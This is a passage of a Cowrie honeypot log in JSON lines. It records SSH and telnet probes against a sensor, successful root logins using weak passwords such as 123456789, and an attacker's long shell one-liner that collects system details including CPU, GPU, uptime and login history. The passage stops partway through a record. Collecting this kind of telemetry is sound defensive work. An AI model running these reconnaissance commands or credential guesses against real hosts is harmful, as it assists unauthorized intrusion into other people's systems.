{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.171394Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.172391Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.173137Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.173814Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.174368Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.175061Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.175515Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.session.file_download","duplicate":false,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.227496Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.228703Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:21:30.229828Z","src_ip":"196.251.115.108","session":"662c40122102"}
{"eventid":"cowrie.session.closed","duration":12.200836420059204,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:21:40.289688Z","src_ip":"36.226.180.253","session":"167d19880fb8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54234,"dst_ip":"1.2.3.4","dst_port":22,"session":"43cfac39a978","protocol":"ssh","message":"New connection: 217.72.205.35:54234 (1.2.3.4:22) [session: 43cfac39a978]","sensor":"my-vps","timestamp":"2025-08-24T22:22:10.706734Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:22:10.708615Z","src_ip":"217.72.205.35","session":"43cfac39a978"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":54386,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2646592050f","protocol":"ssh","message":"New connection: 196.251.115.108:54386 (1.2.3.4:22) [session: b2646592050f]","sensor":"my-vps","timestamp":"2025-08-24T22:22:28.166537Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:22:28.520464Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:22:28.523205Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.479550Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:22:32.885251Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.885932Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.886587Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.887615Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.888941Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.889560Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.890414Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.891524Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.892210Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.892715Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.893151Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.893736Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:22:32.894179Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:22:33.134217Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:22:33.135244Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:22:33.136525Z","src_ip":"196.251.115.108","session":"b2646592050f"}
{"eventid":"cowrie.session.connect","src_ip":"119.116.131.36","src_port":34053,"dst_ip":"1.2.3.4","dst_port":23,"session":"fb4a40c2d94c","protocol":"telnet","message":"New connection: 119.116.131.36:34053 (1.2.3.4:23) [session: fb4a40c2d94c]","sensor":"my-vps","timestamp":"2025-08-24T22:23:11.041798Z"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.115.108","src_port":54772,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ac23330f081","protocol":"ssh","message":"New connection: 196.251.115.108:54772 (1.2.3.4:22) [session: 1ac23330f081]","sensor":"my-vps","timestamp":"2025-08-24T22:23:29.511418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T22:23:29.824963Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-24T22:23:29.825959Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-08-24T22:23:33.755450Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T22:23:34.184406Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.185133Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.185599Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.186536Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.187994Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.188688Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.189426Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.190734Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.191247Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.191895Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.192577Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.193152Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.193627Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.467543Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.468905Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:23:34.469885Z","src_ip":"196.251.115.108","session":"1ac23330f081"}
{"eventid":"cowrie.session.closed","duration":32.27877426147461,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-24T22:23:43.320500Z","src_ip":"119.116.131.36","session":"fb4a40c2d94c"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.236","src_port":60564,"dst_ip":"1.2.3.4","dst_port":22,"session":"8093243461d7","protocol":"ssh","message":"New connection: 205.210.31.236:60564 (1.2.3.4:22) [session: 8093243461d7]","sensor":"my-vps","timestamp":"2025-08-24T22:23:51.643594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-24T22:23:52.602890Z","src_ip":"205.210.31.236","session":"8093243461d7"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd16